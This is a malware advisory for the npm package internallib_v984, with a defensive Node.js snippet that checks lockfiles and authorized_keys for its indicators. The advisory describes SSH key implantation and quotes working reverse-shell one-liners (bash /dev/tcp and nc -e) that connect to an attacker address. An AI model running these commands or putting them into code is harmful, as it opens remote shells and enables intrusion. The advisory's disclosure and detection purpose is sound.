Malicious package

internallib_v984 (npm)

Malicious code in internallib_v984 (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5695
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall internallib_v984

What this malware does

The package exports a single command() function that, when invoked, performs three coordinated attacks against the host:

  (1) It appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) to authorized_keys under /root/.ssh, /home/gitlab-runner/.ssh, and /home/internal/.ssh, granting persistent remote root and CI-runner login.
  (2) It reads /root/root.txt, /home/internal/user.txt, and /home/gitlab-runner/user.txt and writes their contents to stdout.
  (3) It opens a reverse shell to 10.0.0.145:9999 using three redundant methods: bash -i >& /dev/tcp/10.0.0.145/9999 0>&1, nc -e /bin/bash 10.0.0.145 9999, and a Node net.Socket connecting to the same address with spawn('/bin/bash').

The package has no README, no author or repository metadata, and the name internallib_v984 is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality; the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.
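
As an added example (not part of the original advisory and not the package's code), the Node.js functions below check a parsed package-lock.json for internallib_v984 at any version, including transitive copies, and scan authorized_keys text for the key comment named above. The lockfile and key entries are constructed samples, and the function names are hypothetical.

```javascript
// Added triage example; sample data is constructed, function names are hypothetical.
const PKG = 'internallib_v984';             // package name from the advisory
const KEY_COMMENT = 'tr0n@DESKTOP-GVIA2J0'; // SSH key comment from the advisory

// Return [{path, version}] for each occurrence of PKG in a parsed package-lock.json.
// lockfileVersion 2/3 uses "packages" keyed by install path; version 1 nests "dependencies".
function findInLockfile(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // Compare the final path segment so names that merely contain PKG do not match.
    if (path.split('node_modules/').pop() === PKG) hits.push({ path, version: meta.version });
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = `${trail}/${name}`;
      if (name === PKG) hits.push({ path: here, version: meta.version });
      walk(meta.dependencies, here); // transitive copies count too
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits;
}

// Return 1-based line numbers of authorized_keys entries whose fields include KEY_COMMENT.
function findImplantedKeys(text) {
  const found = [];
  text.split(/\r?\n/).forEach((line, i) => {
    const entry = line.trim();
    if (entry === '' || entry.startsWith('#')) return; // skip blanks and comments
    if (entry.split(/\s+/).includes(KEY_COMMENT)) found.push(i + 1);
  });
  return found;
}

// Constructed samples: a v3 lockfile with a nested copy, and an authorized_keys file.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  '': { name: 'app', version: '1.0.0' },
  'node_modules/left-pad': { version: '1.3.0' },
  'node_modules/build-tool/node_modules/internallib_v984': { version: '99.0.0' },
} };
const SAMPLE_KEYS = [
  '# constructed sample file',
  'ssh-ed25519 AAAAC3NzaSAMPLEKEY1 ci@build-host',
  'ssh-rsa AAAAB3NzaSAMPLEKEY2 tr0n@DESKTOP-GVIA2J0',
].join('\n');

console.log(findInLockfile(SAMPLE_LOCK), findImplantedKeys(SAMPLE_KEYS));
```

On a real host, feed these the parsed package-lock.json and the contents of the three authorized_keys files listed above. A key comment is free text that can be changed, so a miss is inconclusive and every unrecognized key in those files still needs review.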

Malicious versions

6 flagged
1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 99.0.0

Indicators of compromise (SHA-256)


Frequently asked questions

No. internallib_v984 on npm has been identified as a malicious package (versions 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 99.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005784, IN-MAL-2026-005786, IN-MAL-2026-005783, IN-MAL-2026-005785, IN-MAL-2026-005782, IN-MAL-2026-005787

Credits

  • Amazon Inspector · finder

internallib_v984 (npm) malicious package — MAL-2026-5695 | O3 Security